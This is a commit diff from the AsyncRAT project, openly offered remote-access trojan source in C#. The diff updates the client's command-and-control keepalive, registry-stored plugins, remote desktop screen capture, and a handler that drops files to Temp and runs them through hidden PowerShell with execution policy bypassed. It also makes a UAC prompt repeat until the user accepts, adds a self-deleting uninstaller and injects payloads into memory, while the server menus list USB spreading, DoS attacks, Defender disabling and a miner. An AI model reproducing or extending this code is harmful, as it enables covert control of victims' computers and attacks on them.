Sapphire/AsyncRAT-C-Sharp
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

update

Browse Source 
added - remote dekstop move movements
added - remote desktop showing cursor movements
added - showing active window when client connected immediately
updated - send file to disk will show if the file ran successfully or not
fixed - send file to disk fixed when executing .ps1 file
updated - UAC popup now will run until the user press accept
This commit is contained in:
NYAN CAT 2020-05-10 08:14:33 +03:00
parent 565441b92a
commit 10c995be22
21 changed files with 282 additions and 239 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

41
AsyncRAT-C#/Client/Connection/ClientSocket.cs
View File

@ -31,6 +31,7 @@ namespace Client.Connection
private static object SendSync { get; } = new object(); //Sync send
private static Timer Ping { get; set; } //Send ping interval
public static int Interval { get; set; } //ping value
public static bool ActivatePong { get; set; }
public static void InitializeClient() //Connect & reconnect
@ -92,7 +93,10 @@ namespace Client.Connection
Buffer = new byte[HeaderSize];
Offset = 0;
Send(IdSender.SendInfo());
KeepAlive = new Timer(new TimerCallback(KeepAlivePacket), null, new Random().Next(15 * 1000, 30 * 1000), new Random().Next(15 * 1000, 60 * 1000));
Interval = 0;
ActivatePong = false;
KeepAlive = new Timer(new TimerCallback(KeepAlivePacket), null, new Random().Next(10 * 1000, 15 * 1000), new Random().Next(10 * 1000, 15 * 1000));
Ping = new Timer(new TimerCallback(Pong), null, 1, 1);
SslClient.BeginRead(Buffer, (int)Offset, (int)HeaderSize, ReadServertData, null);
}
else
@ -124,15 +128,15 @@ namespace Client.Connection
public static void Reconnect()
{
try
{
Ping?.Dispose();
KeepAlive?.Dispose();
SslClient?.Dispose();
TcpClient?.Dispose();
Ping?.Dispose();
KeepAlive?.Dispose();
}
catch { }
IsConnected = false;
}
public static void ReadServertData(IAsyncResult ar) //Socket read/recevie
@ -212,7 +216,7 @@ namespace Client.Connection
{
try
{
if (!IsConnected || msg == null)
if (!IsConnected)
{
return;
}
@ -254,19 +258,28 @@ namespace Client.Connection
public static void KeepAlivePacket(object obj)
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "Ping";
msgpack.ForcePathObject("Message").AsString = Methods.GetActiveWindowTitle();
Send(msgpack.Encode2Bytes());
Ping?.Dispose();
Interval = 0;
Ping = new Timer(new TimerCallback(Pong), null, 1, 1);
GC.Collect();
try
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "Ping";
msgpack.ForcePathObject("Message").AsString = Methods.GetActiveWindowTitle();
Send(msgpack.Encode2Bytes());
GC.Collect();
ActivatePong = true;
}
catch { }
}
private static void Pong(object obj)
{
Interval++;
try
{
if (ActivatePong && IsConnected)
{
Interval++;
}
}
catch { }
}
}
}

19
AsyncRAT-C#/Client/Handle Packet/Packet.cs
View File

@ -24,11 +24,12 @@ namespace Client.Handle_Packet
{
case "pong": //send interval value to server
{
int interval = (int)ClientSocket.Interval;
ClientSocket.ActivatePong = false;
MsgPack msgPack = new MsgPack();
msgPack.ForcePathObject("Packet").SetAsString("pong");
msgPack.ForcePathObject("Message").SetAsInteger(interval);
msgPack.ForcePathObject("Message").SetAsInteger(ClientSocket.Interval);
ClientSocket.Send(msgPack.Encode2Bytes());
ClientSocket.Interval = 0;
break;
}
@ -36,11 +37,7 @@ namespace Client.Handle_Packet
{
try
{
Invoke(unpack_msgpack);
}
catch (Exception ex) // check if plugin is installed
{
if (SetRegistry.GetValue(unpack_msgpack.ForcePathObject("Dll").AsString) == null)
if (SetRegistry.GetValue(unpack_msgpack.ForcePathObject("Dll").AsString) == null) // check if plugin is installed
{
Packs.Add(unpack_msgpack); //save it for later
MsgPack msgPack = new MsgPack();
@ -49,12 +46,16 @@ namespace Client.Handle_Packet
ClientSocket.Send(msgPack.Encode2Bytes());
}
else
Error(ex.Message);
Invoke(unpack_msgpack);
}
catch (Exception ex)
{
Error(ex.Message);
}
break;
}
case "savePlugin": // save plugin as MD5:Base64
case "savePlugin": // save plugin
{
SetRegistry.SetValue(unpack_msgpack.ForcePathObject("Hash").AsString, unpack_msgpack.ForcePathObject("Dll").GetAsBytes());
Debug.WriteLine("plugin saved");

2
AsyncRAT-C#/Client/Helper/IdSender.cs
View File

@ -19,7 +19,7 @@ namespace Client.Helper
msgpack.ForcePathObject("Path").AsString = Application.ExecutablePath;
msgpack.ForcePathObject("Version").AsString = Settings.Version;
msgpack.ForcePathObject("Admin").AsString = Methods.IsAdmin().ToString().ToLower().Replace("true", "Admin").Replace("false", "User");
msgpack.ForcePathObject("Performance").AsString = "...";
msgpack.ForcePathObject("Performance").AsString = Methods.GetActiveWindowTitle();
msgpack.ForcePathObject("Pastebin").AsString = Settings.Pastebin;
msgpack.ForcePathObject("Antivirus").AsString = Methods.Antivirus();
msgpack.ForcePathObject("Installed").AsString = new FileInfo(Application.ExecutablePath).LastWriteTime.ToUniversalTime().ToString();

12
AsyncRAT-C#/Client/Program.cs
View File

@ -46,12 +46,16 @@ namespace Client
while (true) // ~ loop to check socket status
{
if (!ClientSocket.IsConnected)
try
{
ClientSocket.Reconnect();
ClientSocket.InitializeClient();
if (!ClientSocket.IsConnected)
{
ClientSocket.Reconnect();
ClientSocket.InitializeClient();
}
}
Thread.Sleep(new Random().Next(2000, 5000));
catch { }
Thread.Sleep(5000);
}
}
}

2
AsyncRAT-C#/Client/Settings.cs
View File

@ -13,7 +13,7 @@ namespace Client
#if DEBUG
public static string Ports = "6606";
public static string Hosts = "127.0.0.1";
public static string Version = "0.5.7A";
public static string Version = "0.5.7B";
public static string Install = "false";
public static string InstallFolder = "AppData";
public static string InstallFile = "Test.exe";

74
AsyncRAT-C#/Client/app.manifest
View File

@ -1,76 +1,28 @@
<?xml version="1.0" encoding="utf-8"?>
<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<!-- UAC Manifest Options
If you want to change the Windows User Account Control level replace the
requestedExecutionLevel node with one of the following.
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
<requestedExecutionLevel level="requireAdministrator" uiAccess="false" />
<requestedExecutionLevel level="highestAvailable" uiAccess="false" />
Specifying requestedExecutionLevel element will disable file and registry virtualization.
Remove this element if your application requires this virtualization for backwards
compatibility.
-->
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<application>
<!-- A list of the Windows versions that this application has been tested on
and is designed to work with. Uncomment the appropriate elements
and Windows will automatically select the most compatible environment. -->
<!-- Windows Vista -->
<!--<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}" />-->
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<!-- Windows 7 -->
<!--<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}" />-->
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<!-- Windows 8 -->
<!--<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}" />-->
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<!-- Windows 8.1 -->
<!--<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}" />-->
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<!-- Windows 10 -->
<!--<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}" />-->
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
</application>
</compatibility>
<!-- Indicates that the application is DPI-aware and will not be automatically scaled by Windows at higher
DPIs. Windows Presentation Foundation (WPF) applications are automatically DPI-aware and do not need
to opt in. Windows Forms applications targeting .NET Framework 4.6 that opt into this setting, should
also set the 'EnableWindowsFormsHighDpiAutoResizing' setting to 'true' in their app.config. -->
<application xmlns="urn:schemas-microsoft-com:asm.v3">
<windowsSettings>
<dpiAware xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
</windowsSettings>
</application>
<!-- Enable themes for Windows common controls and dialogs (Windows XP and later) -->
<!--
<dependency>
<dependentAssembly>
<assemblyIdentity
type="win32"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
processorArchitecture="*"
publicKeyToken="6595b64144ccf1df"
language="*"
/>
</dependentAssembly>
</dependency>
-->
</assembly>
<asmv3:application xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" >
<asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
<dpiAware>true</dpiAware>
</asmv3:windowsSettings>
</asmv3:application>
</assembly>

3
AsyncRAT-C#/Plugin/Options/Options/Handler/HandleUAC.cs
View File

@ -12,7 +12,6 @@ namespace Plugin.Handler
public HandleUAC()
{
if (Methods.IsAdmin()) return;
try
{
Process proc = new Process
@ -30,7 +29,7 @@ namespace Plugin.Handler
Methods.ClientExit();
Environment.Exit(0);
}
catch { }
catch { new HandleUAC(); }
}
}

42
AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/Packet.cs
View File

@ -38,8 +38,8 @@ namespace Plugin
case "mouseClick":
{
Point position = new Point((Int32)unpack_msgpack.ForcePathObject("X").AsInteger, (Int32)unpack_msgpack.ForcePathObject("Y").AsInteger);
Cursor.Position = position;
//Point position = new Point((Int32)unpack_msgpack.ForcePathObject("X").AsInteger, (Int32)unpack_msgpack.ForcePathObject("Y").AsInteger);
// Cursor.Position = position;
mouse_event((Int32)unpack_msgpack.ForcePathObject("Button").AsInteger, 0, 0, 0, 1);
break;
}
@ -128,9 +128,19 @@ namespace Plugin
try
{
Bitmap bmpScreenshot = new Bitmap(rect.Width, rect.Height, PixelFormat.Format32bppArgb);
using (Graphics gfxScreenshot = Graphics.FromImage(bmpScreenshot))
using (Graphics graphics = Graphics.FromImage(bmpScreenshot))
{
gfxScreenshot.CopyFromScreen(rect.Left, rect.Top, 0, 0, new Size(bmpScreenshot.Width, bmpScreenshot.Height), CopyPixelOperation.SourceCopy);
graphics.CopyFromScreen(rect.Left, rect.Top, 0, 0, new Size(bmpScreenshot.Width, bmpScreenshot.Height), CopyPixelOperation.SourceCopy);
CURSORINFO pci;
pci.cbSize = System.Runtime.InteropServices.Marshal.SizeOf(typeof(CURSORINFO));
if (GetCursorInfo(out pci))
{
if (pci.flags == CURSOR_SHOWING)
{
DrawIcon(graphics.GetHdc(), pci.ptScreenPos.x, pci.ptScreenPos.y, pci.hCursor);
graphics.ReleaseHdc();
}
}
return bmpScreenshot;
}
}
@ -142,5 +152,29 @@ namespace Plugin
[DllImport("user32.dll")]
internal static extern bool keybd_event(byte bVk, byte bScan, uint dwFlags, UIntPtr dwExtraInfo);
[StructLayout(LayoutKind.Sequential)]
struct CURSORINFO
{
public Int32 cbSize;
public Int32 flags;
public IntPtr hCursor;
public POINTAPI ptScreenPos;
}
[StructLayout(LayoutKind.Sequential)]
struct POINTAPI
{
public int x;
public int y;
}
[DllImport("user32.dll")]
static extern bool GetCursorInfo(out CURSORINFO pci);
[DllImport("user32.dll")]
static extern bool DrawIcon(IntPtr hDC, int X, int Y, IntPtr hIcon);
const Int32 CURSOR_SHOWING = 0x00000001;
}
}

22
AsyncRAT-C#/Plugin/SendFile/SendFile/Handler/HandleSendTo.cs
View File

@ -15,35 +15,49 @@ namespace Plugin.Handler
try
{
//Drop To Disk
string fullPath = Path.GetTempFileName() + "g r" + unpack_msgpack.ForcePathObject("Extension").AsString;
string fullPath = Path.Combine(Path.GetTempPath(), Methods.GetRandomString(6) + unpack_msgpack.ForcePathObject("Extension").AsString);
File.WriteAllBytes(fullPath, Zip.Decompress(unpack_msgpack.ForcePathObject("File").GetAsBytes()));
if (unpack_msgpack.ForcePathObject("Extension").AsString.ToLower().EndsWith(".ps1"))
{
Process.Start(new ProcessStartInfo
{
FileName = "cmd",
Arguments = $"/c start /b powershell ExecutionPolicy Bypass -WindowStyle Hidden -NoExit -File {"'" + "\"" + fullPath + "\"" + "'"} & exit",
Arguments = $"/c start /b powershell ExecutionPolicy Bypass -WindowStyle Hidden -NoExit -FilePath {"'" + "\"" + fullPath + "\"" + "'"} & exit",
CreateNoWindow = true,
WindowStyle = ProcessWindowStyle.Hidden,
UseShellExecute = true,
ErrorDialog = false,
});
}
else
{
Process.Start(new ProcessStartInfo
{
FileName = "cmd",
Arguments = $"/c start /b powershell Start-Process -FilePath {"'" + "\"" + fullPath + "\"" + "'"} & exit",
Arguments = $"/c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath {"'" + "\"" + fullPath + "\"" + "'"} & exit",
CreateNoWindow = true,
WindowStyle = ProcessWindowStyle.Hidden,
UseShellExecute = true,
ErrorDialog = false,
});
}
if (unpack_msgpack.ForcePathObject("Update").AsString == "true")
{
new HandleUninstall();
}
else
{
Packet.Log("file executed!");
Thread.Sleep(1000);
if (Process.GetProcessesByName(Path.GetFileNameWithoutExtension(fullPath)).Length > 0)
{
Packet.Log($"Temp\\{Path.GetFileName(fullPath)} executed successfully!");
}
else if (fullPath.ToLower().EndsWith(".ps1") && Process.GetProcessesByName("powershell").Length > 0)
{
Packet.Log($"Temp\\{Path.GetFileName(fullPath)} executed successfully!");
}
}
}
catch (Exception ex)

2
AsyncRAT-C#/Plugin/SendFile/SendFile/Handler/HandleUninstall.cs
View File

@ -45,7 +45,7 @@ namespace Plugin.Handler
using (StreamWriter sw = new StreamWriter(batch))
{
sw.WriteLine("@echo off");
sw.WriteLine("timeout 3 > NUL");
sw.WriteLine("timeout 2 > NUL");
sw.WriteLine("CD " + Application.StartupPath);
sw.WriteLine("DEL " + "\"" + Path.GetFileName(Application.ExecutablePath) + "\"" + " /f /q");
sw.WriteLine("CD " + Path.GetTempPath());

12
AsyncRAT-C#/Plugin/SendFile/SendFile/Methods.cs
View File

@ -14,6 +14,18 @@ namespace Plugin
{
public static class Methods
{
private const string Alphabet = "abcdefghijklmnopqrstuvwxyz";
public static Random Random = new Random();
public static string GetRandomString(int length)
{
StringBuilder randomName = new StringBuilder(length);
for (int i = 0; i < length; i++)
randomName.Append(Alphabet[Random.Next(Alphabet.Length)]);
return randomName.ToString();
}
public static void ClientExit()
{
try

4
AsyncRAT-C#/Plugin/SendMemory/SendMemory/Handler/HandleSendTo.cs
View File

@ -10,7 +10,7 @@ namespace Plugin.Handler
{
public class HandleSendTo
{
public void SendToMemory(MsgPack unpack_msgpack)
public void ToMemory(MsgPack unpack_msgpack)
{
try
{
@ -46,7 +46,7 @@ namespace Plugin.Handler
{
try
{
global::Plugin.SendToMemory.Execute(Path.Combine(RuntimeEnvironment.GetRuntimeDirectory().Replace("Framework64", "Framework"), injection), Zip.Decompress(buffer));
SendToMemory.Execute(Path.Combine(RuntimeEnvironment.GetRuntimeDirectory().Replace("Framework64", "Framework"), injection), Zip.Decompress(buffer));
}
catch (Exception ex)
{

2
AsyncRAT-C#/Plugin/SendMemory/SendMemory/Packet.cs
View File

@ -16,7 +16,7 @@ namespace Plugin
{
case "sendMemory":
{
new HandleSendTo().SendToMemory(unpack_msgpack);
new HandleSendTo().ToMemory(unpack_msgpack);
break;
}
}

222
AsyncRAT-C#/Server/Forms/Form1.Designer.cs generated
View File

@ -33,6 +33,7 @@
this.listView1 = new System.Windows.Forms.ListView();
this.lv_ip = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
this.lv_country = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
this.lv_group = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
this.lv_hwid = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
this.lv_user = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
this.lv_os = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
@ -80,17 +81,7 @@
this.disableWindowsDefenderToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.setWallpaperToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.systemToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.clientToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.closeToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem();
this.restartToolStripMenuItem2 = new System.Windows.Forms.ToolStripMenuItem();
this.updateToolStripMenuItem2 = new System.Windows.Forms.ToolStripMenuItem();
this.uninstallToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.toolStripSeparator3 = new System.Windows.Forms.ToolStripSeparator();
this.showFolderToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.pCToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.logoffToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem();
this.restartToolStripMenuItem3 = new System.Windows.Forms.ToolStripMenuItem();
this.shutdownToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem();
this.toolStripSeparator1 = new System.Windows.Forms.ToolStripSeparator();
this.serverToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.blockClientsToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
@ -131,7 +122,16 @@
this.performanceCounter2 = new System.Diagnostics.PerformanceCounter();
this.notifyIcon1 = new System.Windows.Forms.NotifyIcon(this.components);
this.TimerTask = new System.Windows.Forms.Timer(this.components);
this.lv_group = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
this.shutdownToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem();
this.restartToolStripMenuItem3 = new System.Windows.Forms.ToolStripMenuItem();
this.logoffToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem();
this.closeToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem();
this.restartToolStripMenuItem2 = new System.Windows.Forms.ToolStripMenuItem();
this.updateToolStripMenuItem2 = new System.Windows.Forms.ToolStripMenuItem();
this.uninstallToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.toolStripSeparator3 = new System.Windows.Forms.ToolStripSeparator();
this.showFolderToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.clientToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.contextMenuClient.SuspendLayout();
this.statusStrip1.SuspendLayout();
this.tabControl1.SuspendLayout();
@ -189,6 +189,11 @@
this.lv_country.Text = "Country";
this.lv_country.Width = 124;
//
// lv_group
//
this.lv_group.Text = "Group";
this.lv_group.Width = 110;
//
// lv_hwid
//
this.lv_hwid.Text = "HWID";
@ -249,7 +254,7 @@
this.toolStripSeparator5,
this.bUILDERToolStripMenuItem});
this.contextMenuClient.Name = "contextMenuStrip1";
this.contextMenuClient.Size = new System.Drawing.Size(203, 278);
this.contextMenuClient.Size = new System.Drawing.Size(238, 278);
//
// aBOUTToolStripMenuItem
//
@ -397,7 +402,7 @@
//
this.botsKillerToolStripMenuItem.Image = global::Server.Properties.Resources.botkiller;
this.botsKillerToolStripMenuItem.Name = "botsKillerToolStripMenuItem";
this.botsKillerToolStripMenuItem.Size = new System.Drawing.Size(260, 34);
this.botsKillerToolStripMenuItem.Size = new System.Drawing.Size(270, 34);
this.botsKillerToolStripMenuItem.Text = "Bots Killer";
this.botsKillerToolStripMenuItem.Click += new System.EventHandler(this.BotsKillerToolStripMenuItem_Click);
//
@ -405,7 +410,7 @@
//
this.uSBSpreadToolStripMenuItem1.Image = global::Server.Properties.Resources.usb;
this.uSBSpreadToolStripMenuItem1.Name = "uSBSpreadToolStripMenuItem1";
this.uSBSpreadToolStripMenuItem1.Size = new System.Drawing.Size(260, 34);
this.uSBSpreadToolStripMenuItem1.Size = new System.Drawing.Size(270, 34);
this.uSBSpreadToolStripMenuItem1.Text = "USB Spread";
this.uSBSpreadToolStripMenuItem1.Click += new System.EventHandler(this.USBSpreadToolStripMenuItem1_Click);
//
@ -413,7 +418,7 @@
//
this.seedTorrentToolStripMenuItem1.Image = global::Server.Properties.Resources.u_torrent_logo;
this.seedTorrentToolStripMenuItem1.Name = "seedTorrentToolStripMenuItem1";
this.seedTorrentToolStripMenuItem1.Size = new System.Drawing.Size(260, 34);
this.seedTorrentToolStripMenuItem1.Size = new System.Drawing.Size(270, 34);
this.seedTorrentToolStripMenuItem1.Text = "Seed Torrent";
this.seedTorrentToolStripMenuItem1.Click += new System.EventHandler(this.SeedTorrentToolStripMenuItem1_Click_1);
//
@ -421,7 +426,7 @@
//
this.remoteShellToolStripMenuItem1.Image = global::Server.Properties.Resources.shell;
this.remoteShellToolStripMenuItem1.Name = "remoteShellToolStripMenuItem1";
this.remoteShellToolStripMenuItem1.Size = new System.Drawing.Size(260, 34);
this.remoteShellToolStripMenuItem1.Size = new System.Drawing.Size(270, 34);
this.remoteShellToolStripMenuItem1.Text = "Remote Shell";
this.remoteShellToolStripMenuItem1.Click += new System.EventHandler(this.RemoteShellToolStripMenuItem1_Click_1);
//
@ -429,7 +434,7 @@
//
this.dOSAttackToolStripMenuItem.Image = global::Server.Properties.Resources.ddos;
this.dOSAttackToolStripMenuItem.Name = "dOSAttackToolStripMenuItem";
this.dOSAttackToolStripMenuItem.Size = new System.Drawing.Size(260, 34);
this.dOSAttackToolStripMenuItem.Size = new System.Drawing.Size(270, 34);
this.dOSAttackToolStripMenuItem.Text = "DOS Attack";
this.dOSAttackToolStripMenuItem.Click += new System.EventHandler(this.DOSAttackToolStripMenuItem_Click_1);
//
@ -437,7 +442,7 @@
//
this.executeNETCodeToolStripMenuItem.Image = global::Server.Properties.Resources.coding;
this.executeNETCodeToolStripMenuItem.Name = "executeNETCodeToolStripMenuItem";
this.executeNETCodeToolStripMenuItem.Size = new System.Drawing.Size(260, 34);
this.executeNETCodeToolStripMenuItem.Size = new System.Drawing.Size(270, 34);
this.executeNETCodeToolStripMenuItem.Text = "Execute .NET Code";
this.executeNETCodeToolStripMenuItem.Click += new System.EventHandler(this.ExecuteNETCodeToolStripMenuItem_Click_1);
//
@ -448,7 +453,7 @@
this.killToolStripMenuItem});
this.xMRMinerToolStripMenuItem.Image = global::Server.Properties.Resources.xmr;
this.xMRMinerToolStripMenuItem.Name = "xMRMinerToolStripMenuItem";
this.xMRMinerToolStripMenuItem.Size = new System.Drawing.Size(260, 34);
this.xMRMinerToolStripMenuItem.Size = new System.Drawing.Size(270, 34);
this.xMRMinerToolStripMenuItem.Text = "XMR Miner";
this.xMRMinerToolStripMenuItem.Visible = false;
//
@ -472,7 +477,7 @@
//
this.filesSearcherToolStripMenuItem.Image = global::Server.Properties.Resources.report;
this.filesSearcherToolStripMenuItem.Name = "filesSearcherToolStripMenuItem";
this.filesSearcherToolStripMenuItem.Size = new System.Drawing.Size(260, 34);
this.filesSearcherToolStripMenuItem.Size = new System.Drawing.Size(270, 34);
this.filesSearcherToolStripMenuItem.Text = "Files Searcher";
this.filesSearcherToolStripMenuItem.Click += new System.EventHandler(this.filesSearcherToolStripMenuItem_Click);
//
@ -572,62 +577,8 @@
this.pCToolStripMenuItem});
this.systemToolStripMenuItem.Image = global::Server.Properties.Resources.system;
this.systemToolStripMenuItem.Name = "systemToolStripMenuItem";
this.systemToolStripMenuItem.Size = new System.Drawing.Size(202, 32);
this.systemToolStripMenuItem.Text = "System";
//
// clientToolStripMenuItem
//
this.clientToolStripMenuItem.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] {
this.closeToolStripMenuItem1,
this.restartToolStripMenuItem2,
this.updateToolStripMenuItem2,
this.uninstallToolStripMenuItem,
this.toolStripSeparator3,
this.showFolderToolStripMenuItem});
this.clientToolStripMenuItem.Image = global::Server.Properties.Resources.client;
this.clientToolStripMenuItem.Name = "clientToolStripMenuItem";
this.clientToolStripMenuItem.Size = new System.Drawing.Size(158, 34);
this.clientToolStripMenuItem.Text = "Client";
//
// closeToolStripMenuItem1
//
this.closeToolStripMenuItem1.Name = "closeToolStripMenuItem1";
this.closeToolStripMenuItem1.Size = new System.Drawing.Size(213, 34);
this.closeToolStripMenuItem1.Text = "Close";
this.closeToolStripMenuItem1.Click += new System.EventHandler(this.CloseToolStripMenuItem1_Click);
//
// restartToolStripMenuItem2
//
this.restartToolStripMenuItem2.Name = "restartToolStripMenuItem2";
this.restartToolStripMenuItem2.Size = new System.Drawing.Size(213, 34);
this.restartToolStripMenuItem2.Text = "Restart";
this.restartToolStripMenuItem2.Click += new System.EventHandler(this.RestartToolStripMenuItem2_Click);
//
// updateToolStripMenuItem2
//
this.updateToolStripMenuItem2.Name = "updateToolStripMenuItem2";
this.updateToolStripMenuItem2.Size = new System.Drawing.Size(213, 34);
this.updateToolStripMenuItem2.Text = "Update";
this.updateToolStripMenuItem2.Click += new System.EventHandler(this.UpdateToolStripMenuItem2_Click);
//
// uninstallToolStripMenuItem
//
this.uninstallToolStripMenuItem.Name = "uninstallToolStripMenuItem";
this.uninstallToolStripMenuItem.Size = new System.Drawing.Size(213, 34);
this.uninstallToolStripMenuItem.Text = "Uninstall";
this.uninstallToolStripMenuItem.Click += new System.EventHandler(this.UninstallToolStripMenuItem_Click);
//
// toolStripSeparator3
//
this.toolStripSeparator3.Name = "toolStripSeparator3";
this.toolStripSeparator3.Size = new System.Drawing.Size(210, 6);
//
// showFolderToolStripMenuItem
//
this.showFolderToolStripMenuItem.Name = "showFolderToolStripMenuItem";
this.showFolderToolStripMenuItem.Size = new System.Drawing.Size(213, 34);
this.showFolderToolStripMenuItem.Text = "Show Folder";
this.showFolderToolStripMenuItem.Click += new System.EventHandler(this.ShowFolderToolStripMenuItem_Click);
this.systemToolStripMenuItem.Size = new System.Drawing.Size(237, 32);
this.systemToolStripMenuItem.Text = "Client Managment";
//
// pCToolStripMenuItem
//
@ -640,27 +591,6 @@
this.pCToolStripMenuItem.Size = new System.Drawing.Size(158, 34);
this.pCToolStripMenuItem.Text = "PC";
//
// logoffToolStripMenuItem1
//
this.logoffToolStripMenuItem1.Name = "logoffToolStripMenuItem1";
this.logoffToolStripMenuItem1.Size = new System.Drawing.Size(195, 34);
this.logoffToolStripMenuItem1.Text = "Logoff";
this.logoffToolStripMenuItem1.Click += new System.EventHandler(this.LogoffToolStripMenuItem1_Click);
//
// restartToolStripMenuItem3
//
this.restartToolStripMenuItem3.Name = "restartToolStripMenuItem3";
this.restartToolStripMenuItem3.Size = new System.Drawing.Size(195, 34);
this.restartToolStripMenuItem3.Text = "Restart";
this.restartToolStripMenuItem3.Click += new System.EventHandler(this.RestartToolStripMenuItem3_Click);
//
// shutdownToolStripMenuItem1
//
this.shutdownToolStripMenuItem1.Name = "shutdownToolStripMenuItem1";
this.shutdownToolStripMenuItem1.Size = new System.Drawing.Size(195, 34);
this.shutdownToolStripMenuItem1.Text = "Shutdown";
this.shutdownToolStripMenuItem1.Click += new System.EventHandler(this.ShutdownToolStripMenuItem1_Click);
//
// toolStripSeparator1
//
this.toolStripSeparator1.Name = "toolStripSeparator1";
@ -679,7 +609,7 @@
//
this.blockClientsToolStripMenuItem.Image = global::Server.Properties.Resources.disabled;
this.blockClientsToolStripMenuItem.Name = "blockClientsToolStripMenuItem";
this.blockClientsToolStripMenuItem.Size = new System.Drawing.Size(213, 34);
this.blockClientsToolStripMenuItem.Size = new System.Drawing.Size(270, 34);
this.blockClientsToolStripMenuItem.Text = "Block Clients";
this.blockClientsToolStripMenuItem.Click += new System.EventHandler(this.BlockClientsToolStripMenuItem_Click);
//
@ -993,10 +923,80 @@
this.TimerTask.Interval = 5000;
this.TimerTask.Tick += new System.EventHandler(this.TimerTask_Tick);
//
// lv_group
// shutdownToolStripMenuItem1
//
this.lv_group.Text = "Group";
this.lv_group.Width = 110;
this.shutdownToolStripMenuItem1.Name = "shutdownToolStripMenuItem1";
this.shutdownToolStripMenuItem1.Size = new System.Drawing.Size(270, 34);
this.shutdownToolStripMenuItem1.Text = "Shutdown";
this.shutdownToolStripMenuItem1.Click += new System.EventHandler(this.ShutdownToolStripMenuItem1_Click);
//
// restartToolStripMenuItem3
//
this.restartToolStripMenuItem3.Name = "restartToolStripMenuItem3";
this.restartToolStripMenuItem3.Size = new System.Drawing.Size(270, 34);
this.restartToolStripMenuItem3.Text = "Restart";
this.restartToolStripMenuItem3.Click += new System.EventHandler(this.RestartToolStripMenuItem3_Click);
//
// logoffToolStripMenuItem1
//
this.logoffToolStripMenuItem1.Name = "logoffToolStripMenuItem1";
this.logoffToolStripMenuItem1.Size = new System.Drawing.Size(270, 34);
this.logoffToolStripMenuItem1.Text = "Logoff";
this.logoffToolStripMenuItem1.Click += new System.EventHandler(this.LogoffToolStripMenuItem1_Click);
//
// closeToolStripMenuItem1
//
this.closeToolStripMenuItem1.Name = "closeToolStripMenuItem1";
this.closeToolStripMenuItem1.Size = new System.Drawing.Size(270, 34);
this.closeToolStripMenuItem1.Text = "Close";
this.closeToolStripMenuItem1.Click += new System.EventHandler(this.CloseToolStripMenuItem1_Click);
//
// restartToolStripMenuItem2
//
this.restartToolStripMenuItem2.Name = "restartToolStripMenuItem2";
this.restartToolStripMenuItem2.Size = new System.Drawing.Size(270, 34);
this.restartToolStripMenuItem2.Text = "Restart";
this.restartToolStripMenuItem2.Click += new System.EventHandler(this.RestartToolStripMenuItem2_Click);
//
// updateToolStripMenuItem2
//
this.updateToolStripMenuItem2.Name = "updateToolStripMenuItem2";
this.updateToolStripMenuItem2.Size = new System.Drawing.Size(270, 34);
